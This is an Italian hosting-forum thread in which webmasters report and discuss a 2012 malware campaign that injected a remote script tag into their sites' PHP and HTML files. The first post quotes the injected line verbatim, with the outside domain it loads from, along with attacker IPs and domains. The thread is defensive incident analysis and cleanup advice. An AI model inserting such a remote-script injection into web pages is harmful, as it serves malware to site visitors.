Malware su sito, come evitarlo

[nonciclopedia]

Salve a tutti!

Oggi alcuni utenti del forum di Nonciclopedia ci hanno segnalato un malware.
Purtroppo la cosa non mi è suonata nuova, perché in questi giorni ho riscontrato personalmente lo stesso problema su alcuni siti con un altro hosting.
Ma a quanto pare il problema è molto diffuso (basta guardare le segnalazioni recenti che avete avuto qui stesso: 1, 2, 3, 4, 5, ecc ecc)
Mentre su google si trova ancora poca roba, per lo più altri siti infetti ed una ragazza (vostra utente, pare) che si lamenta sul forum di phpBB.

Intanto vorrei sapere dove poter controllare gli accessi ftp o quelli al pannello di controllo... spero che non li forniate solo se richiesti dalla Polpost. (scusate la frecciatina, ma non avendo mai ricevuto risposta su questo argomento, era dovuta. Comunque ormai non serve più una risposta, l'abbiamo scoperto da soli.)
Poi capire anche se è la stessa cosa (o simile) che sta succedendo agli altri utenti.
Ed infine capire COME hanno fatto ad accedere a siti diversi, con hosting diversi e cms diversi (o anche nessun cms).

Nei siti che ho potuto controllare l'IP 95.211.43.6 era sempre lo stesso, per esempio:
Mon Apr 02 01:51:20 2012 0 95.211.43.6
Mon Apr 02 01:51:21 2012 0 95.211.43.6
Mon Apr 02 01:51:23 2012 1 95.211.43.6
Mon Apr 02 01:51:25 2012 0 95.211.43.6
Mon Apr 02 01:51:26 2012 0 95.211.43.6
...e come potete notare le modifiche fatte sono consecutive nell'arco di pochi secondi, quindi sarà stato usato un bot.

Le modifiche fatte sono più o meno sempre le stesse:
1) sono stati modificati tutti i php ed html (qualche volta anche txt) nelle sole cartelle di root
2) la modifica consiste nell'inserimento della riga

Codice:

<script type="text/javascript" src="http://unitedsquashleague.com/players/code.js"></script>

Il risultato è l'avvio di Java e seguente installazione di malware nel sistema operativo, consiglio quindi a tutti, per precauzione, di disabilitare i plugin Java... almeno per adesso.

Quindi sono andato nella root, ho ripulito dalla riga i file modificati di recente ed è tornato tutto normale.



Facendo un po' di "indagini", l'IP è Olandese e della Leaseweb. Quindi l'attacco potrebbe provenire da un server-zombie. Ma non solo:
1) UnitedSquashLeague.com a quanto pare è un vecchio dominio e quindi forse è un'altra vittima... in quel code.js (che tra l'altro nel sito non compare da nessuna parte, sembra pulito... forse l'hanno usato solo come redirect) c'è un iframe richiama invece un altro sito, helpindowns.in, un sito fantasma che è stato registrato abbastanza di recente per la prima volta in assoluto, e sarà il colpevole perché se guardate tra i dati del Registrant si nota che sono farlocchi (città "NewYourk", tel +1.1231231, ecc)
2) questo helpindowns usa afraid.org come DNS, un sito che offre DNS gratis, quindi penso non abbia manco l'hosting ma solo il dominio. Sempre dal whois si vede che il server ha un ip generico 188.72.194.251 che andando a controllare, in fondo, dice che appartiene a Leaseweb Germany... qui il collegamento con l'IP colpevole. Tra l'altro nel campo "Reverse IP:" dice <<3 websites use this address. (examples: helpindowns.in helpindownx.in helpindownz.in) >>, magari sono altri siti-fantoccio.
3) Nel whois dell'ip 188.72.194.251 c'è anche un riferimento ad un hostmaniac.com (whois) che per essere un hosting non ha sito, quindi sarà un altro fantoccio, registrato da un certo Anton Sogreev... un russo, guarda un po'.


Ora, al di là della semplice pulizia, come bisogna comportarsi?
Segnalare ad unitedsquashleague.com che hanno quel js infetto?
Segnalare a Leaseweb l'IP e i vari hosting fantoccio?
Che altro?

(...forse se pinnate il topic evitate agli altri di aprirne di nuovi)

[Gianluca]

Ed infine capire COME hanno fatto ad accedere a siti diversi, con hosting diversi e cms diversi (o anche nessun cms).

Gran parte dei virus/malware di ultima generazione, una volta compromesso il proprio pc, colleziona eventuali credenziali di accesso dai client FTP installati o dalle mailbox in uso, poi utilizzate da bot per caricare il malware nei rispettivi spazi web.
Questo spiega perché il fenomeno si manifesta indistintamente su differenti account su differenti hosting e differenti CMS, così come la sua diffusione.

Qui un articolo che illustra ad esempio il funzionamento di koobface (particolarmente interessante la sezione "to webmasters"): http://blog.unmaskparasites.com/2010...b-of-koobface/

Ora, al di là della semplice pulizia, come bisogna comportarsi?
Segnalare ad unitedsquashleague.com che hanno quel js infetto?
Segnalare a Leaseweb l'IP e i vari hosting fantoccio?
Che altro?

1) Segnalare alle entità coinvolte è sicuramente utile
2) Mantenere il pc pulito
3) Evitare di salvare le proprie credenziali
4) Evitare di accedere con le proprie credenziali da terminali pubblici/condivisi
5) Cambiare spesso password, dal momento che passa del tempo da quando le credenziali sono trafugate dal pc infetto al momento in cui sono usate

Gran parte dei virus/malware di ultima generazione, una volta compromesso il proprio pc, colleziona eventuali credenziali di accesso dai client FTP installati o dalle mailbox in uso, poi utilizzate da bot per caricare il malware nei rispettivi spazi web.
Questo spiega perché il fenomeno si manifesta indistintamente su differenti account su differenti hosting e differenti CMS, così come la sua diffusione.

Qui un articolo che illustra ad esempio il funzionamento di koobface (particolarmente interessante la sezione "to webmasters"): http://blog.unmaskparasites.com/2010...b-of-koobface/



1) Segnalare alle entità coinvolte è sicuramente utile
2) Mantenere il pc pulito
3) Evitare di salvare le proprie credenziali
4) Evitare di accedere con le proprie credenziali da terminali pubblici/condivisi
5) Cambiare spesso password, dal momento che passa del tempo da quando le credenziali sono trafugate dal pc infetto al momento in cui sono usate

Alla Cortese Attenzione del Sig. Gianluca,
Sono il gestore responsabile del dominio "isolandia.it" (sottodominio AV isolagru.altervista.org), e sono stato anche io VITTIMA di questo virus/malware... Nonostante ho seguito la procedura da Voi indicata via Email per riaccedere al mio account, quest'ultimo è ancora COMPLETAMENTE bloccato!!
Non capisco per quale motivo in quanto Voi a conoscenza del virus e del file infetto non avete agito in modo da cancellarlo in modo definitivo invece di bloccare completamente l'attività dei vostri utenti oscurando completamente i siti VITTIME di questo attacco... Avete, nel tentativo di proteggerli, causato dei danni morali e (in alcuni casi) economici alle attività dei vostri utenti bloccandogli completamente qualsiasi canale di comunicazione e non dandogli la possibilità di riparare il danno cancellando anche manualmente il file virus/malware, causa di questo problema...
Vi chiedo cortesemente di sbloccare il mio account il prima possibile, ringrazio per la cortese attenzione!!

[Gianluca]

isolagru:

Se hai seguito le istruzioni e ripulito lo spazio web dal materiale infetto il traffico sarà sbloccato, e se non fosse così in tempi brevi puoi contattare l'abuse: http://it.altervista.org/contatti.php, comunque accertati di aver fatto tutto, perché nel tuo spazio web risulta ancora esserci materiale infetto.

AlterVista si limita a tutelare sia il webmaster, ma anche il visitatore, impedendo l'accesso a materiale infetto, nulla da eccepire sul fatto che il webmaster sia una vittima in questo caso, ma appunto per evitare che le vittime aumentino e l'infezione cresca è appunto necessario bloccare l'accesso al sito.

Non è infine mestiere di AlterVista andare a modificare quanto contenuto nello spazio web di sua iniziativa, cancellare o modificare files, il compito è del webmaster, che è responsabile dei contenuti che consciamente o meno immette in rete.

isolagru:
Se hai seguito le istruzioni e ripulito lo spazio web dal materiale infetto il traffico sarà sbloccato, e se non fosse così in tempi brevi puoi contattare l'abuse: http://it.altervista.org/contatti.php, comunque accertati di aver fatto tutto, perché nel tuo spazio web risulta ancora esserci materiale infetto.

Sig. Gianluca, NON ci è possibile cancellare il file infetto in quanto :
Su FTP mi risponde:

Errore Grave

Sul nostro CP (Pannello di Controllo) mi risponde:

Non riesco ad accedere ai tuoi files, può essere un problema transitorio dovuto ad un aggiornamento o guasto, in questo caso se il fatto persiste per oltre 2 ore consecutive inoltra una segnalazione nel forum.

AlterVista si limita a tutelare sia il webmaster, ma anche il visitatore, impedendo l'accesso a materiale infetto, nulla da eccepire sul fatto che il webmaster sia una vittima in questo caso, ma appunto per evitare che le vittime aumentino e l'infezione cresca è appunto necessario bloccare l'accesso al sito.

Non vorrei essere polemico, però non c'era una metodo meno drastico per bloccare la diffusione del virus/malware come ad esempio bloccare i permessi (mettendoli a 000) del/dei file/files infetto/i??

Non è infine mestiere di AlterVista andare a modificare quanto contenuto nello spazio web di sua iniziativa, cancellare o modificare files, il compito è del webmaster, che è responsabile dei contenuti che consciamente o meno immette in rete.

[dreadnaut]

Non vorrei essere polemico, però non c'era una metodo meno drastico per bloccare la diffusione del virus/malware come ad esempio bloccare i permessi (mettendoli a 000) del/dei file/files infetto/i??

Questo purtroppo non è possibile: spesso non c'è un singolo "file infetto", ma pezzi di codice malevolo inseriti all'interno dei normali script del sito.

Bloccare con i permessi come suggerisci eviterebbe l'infezione, si, ma lascerebbe gli script che compongono il sito in uno stato "rotto" ma ancora funzionante che potrebbe provocare seri danni ai dati dell'utente.

[Gianluca]

isolagru:

Scrivi all'Abuse come ti ho suggerito

Questo purtroppo non è possibile: spesso non c'è un singolo "file infetto", ma pezzi di codice malevolo inseriti all'interno dei normali script del sito.

Bloccare con i permessi come suggerisci eviterebbe l'infezione, si, ma lascerebbe gli script che compongono il sito in uno stato "rotto" ma ancora funzionante che potrebbe provocare seri danni ai dati dell'utente.

La ringrazio per la sua spiegazione precisa sul motivo... purtroppo nonostante ho seguito la procedura indicata da AV 2 o 3 giorni fa, riesco ad accedere al mio account, però non ai miei files......

isolagru:

Scrivi all'Abuse come ti ho suggerito

L'avevo già fatto, però l'abuse mi manda solo dei link al forum dove ci sono solo suggerimenti...
"Cambiare spesso la password"
"Non memorizzare la password"
...ecc, ecc...

Non vengo in alcun modo aiutato per recuperare i miei files...

[Gianluca]

isolagru:

Non risulta nessuna tua mail all'Abuse, scrivi all'indirizzo che trovi nella pagina che ti ho linkato

isolagru:

Non risulta nessuna tua mail all'Abuse, scrivi all'indirizzo che trovi nella pagina che ti ho linkato

Adesso ho tolto TUTTO ciò che non mi risultava che aver messo io sul sito, attendo che sblocchiate il mio account. Grazie. Distinti Saluti.

[Gianluca]

isolagru:

Il tuo sito è appunto accessibile

[platinumleaguefc]

Buongiorno,
ho deciso di rivolgermi a qualcuno qui perché non so più cosa fare...
è dal 28/03 circa che miei utenti mi segnalano l'attacco di un malware sul nostro sito, ma solo su due cartelle specifiche (altre che contengono gli stessi file non risultano avere problemi).

Premesso che ho provato a:
1) eliminare dal file infetto il codice malware
2) sostituire i file segnalati come infetti con copia sana
3) sovrascrivere le sottocartella dove veniva segnalato l file infetto con copia sana
4) sovrascrivere tutte le cartelle infette con copia sana
5) cancellare completamente e ricaricare le cartelle infette

Premesso che i file che carico dal mio computer sono affidabili al 100% (effettuate scansioni complete, cancellazioni cache e quant'altro possibile)

A oggi continua a ripresentarsi il problema.
Come posso fare? Qualcuno è in grado di darmi una mano?

Ringrazio anticipatamente per l'attenzione

[alemoppo]

Dovresti eseguire questi punti:

1) Segnalare alle entità coinvolte è sicuramente utile
2) Mantenere il pc pulito
3) Evitare di salvare le proprie credenziali
4) Evitare di accedere con le proprie credenziali da terminali pubblici/condivisi
5) Cambiare spesso password, dal momento che passa del tempo da quando le credenziali sono trafugate dal pc infetto al momento in cui sono usate

In particolare, prima di sostituire i file corrotti con quelli affidabili, dovresti prima cambiare password sul tuo account altervista.

p.s: non riesumare le vecchie discussioni!

Ciao!

[quizzical]

Ho avuto una esperienza del genere da un giorno all'altro mi sono ritrovato dei malware tra i miei file.

All'inizio non capivo come poteva essere successo, non avevo script vulnerabili (ad esempio il classico upload di file scritto male) ma un CMS aggiornato all'ultima versione e assai rinomato.

Alla fine ho scoperto che la causa era il servizio hosting condiviso che usavo allora che era configurato male e permetteva a utenti malintenzionati di accedere alla mia root directory.
Qui su altervista invece non mi è successo e dopo 10 anni sono abbastanza sicuro non succederà

[programsdexstex]

Non riesco ad accedere ai tuoi files, può essere un problema transitorio dovuto ad un aggiornamento o guasto, in questo caso se il fatto persiste per oltre 2 ore consecutive inoltra una segnalazione nel forum.Possibile che dopotutto un utente a cancellato tutto dal suo sever l'account da 1 mese non mi viene riprestinato dopo tutto che ho pagato lo spazio sever mi puzza di truffa...........

[asel]

sito asel.altervista.org Nonostante ho seguito la procedura da Voi indicata via Email per riaccedere al mio account, quest'ultimo è ancora COMPLETAMENTE bloccato!! come possiamo risolvere ?

[Gianluca]

Hai contattato l'abuse come scritto sopra? http://it.altervista.org/contatti.php#abuse

[effettolunatico]

Ragazzi scusate se mi intrometto in questa discussione (non mi sembrava il caso di aprirne un'altra sullo stesso argomento) ma io da qualche giorno ho problemoni con degli iframe Un malwere che qualcuno mi installa nel codice html del mio forum che ovviamente fanno risultare, agli occhi di google, il sito come malevolo. Con qualsiasi browser provo ad accedere mi esce il messaggio che il sito potrebbe arrecare danni al pc ho sempre e puntualmente rimosso gli iframe in questione ma tempo 24 ore scarse e me li ritrovo di nuovo....ho aggiornato il forum ad una versione successiva ricaricando tutti i file da ftp ma il problema resta lo stesso.... l'accesso al sito ed al pannello di controllo di altervista non è intaccato è tutto regolare ogni volta che cancello l'iframe comunque cambio sia la password di amministratore sia la password di altervista ma il problema si ripresenta puntuale il giorno dopo....qualcuno sa come risolvere questa grana? ho scritto all'abuse ma non ho ottenuto risposta spero che qualcuno di voi ne sappia più di me... grazie a quanti riusciranno a capirci qualcosa....

[Gianluca]

effettolunatico:

l'Abuse non ti può ovviamente aiutare a risolvere questo problema, come potrebbe?
Probabilmente l'aggiornamento del forum non è sufficiente, dovresti verificare se hai nel tuo spazio web qualche shell php, magari introdotta sfruttando qualche problema della precedente versione.

[effettolunatico]

Ciao Gianluca e grazie per la risposta ma una domanda mi sorge spontanea come faccio a trovare questa ipotetica shell?
A parte questo avevo pensato di cancellare tutti ma proprio tutti i file presenti nel mio spazio per poi reinstallare una versione pulita del forum, anche se l'avviso me lo da soltanto per le pagine del forum attivo...se entro in qualsiasi altro link caricato sul mio spazio non compare nessun avviso, tu dici che sia possibile poi utilizzare il database già esistente? Cioè man mano che installerò le mod e le varie modifiche e plugin che avevo nel forum attivo funzioneranno anche in quello che avrò reinstallato oppure perderò tutto?
Per farla breve... è possibile utilizzare un database già esistente per un forum nuovo di zecca? Grazie per un'eventuale risposta!

[Gianluca]

effettolunarico:

se la versione del forum che andrai a ricaricare sarà la stessa suppongo di sì. Non è escluso che il problema possa annidarsi nel database stesso, ma certamente eliminare tutto e ricaricare qualcosa di pulito è certamente un primo passo.

ciao, stamattina hjo avuto anche io la segnalazione da parte di google di un malware. per ora sembra solo per il forum e non per il blog. la soluzione quindi è reistallare il forum? come si può evitare di incappare nei malware?

[Gianluca]

Queste sono le linee guida generali: http://forum.it.altervista.org/probl...tml#post893463 , a cui va aggiunto il mantenere aggiornati i propri applicativi

Queste sono le linee guida generali: http://forum.it.altervista.org/probl...tml#post893463 , a cui va aggiunto il mantenere aggiornati i propri applicativi

E quindi?? a cosa mi serve questo per capire come pulire sto cavolo di sito??? E' mai possibile che altervista non disponga di un antivirus o uno strumento di diagnostica per i domini che ospita??? assurdo!

[Gianluca]

smartphoneitaly:

AlterVista dispone di una serie di strumenti per rilevare fenomeni simili e notificarne ai diretti interessati la presenza, fermo restando che non in ogni caso possono essere rilevati e non è compito di AlterVista farlo.

Ovviamente non può fare la scansione del tuo pc e occuparsi di aggiornare o anche solo analizzare ogni eventuale applicativo che decidi di installare nel tuo spazio web.

Premesso questo visto che è Google che ti ha segnalato il malware (sia esso reale o falso positivo) sarà Google in grado di darti le informazioni in merito, e le dovresti trovare nei webmaster tools che ti mette a disposizione.

Mi entrano dei virus nel sito come eliminarli ho installato l' antivirus ma il problema si ripete

Premetto che ho un dispositivo mobile

[karl94]

Andrlisa: non riesumare una discussione vecchia più di un anno. Sul tuo sito non noto alcuna traccia di materiale dannoso o malevolo. Apri una nuova discussione spiegando esattamente qual è il problema e riportando eventuali messaggi di errore che visualizzi.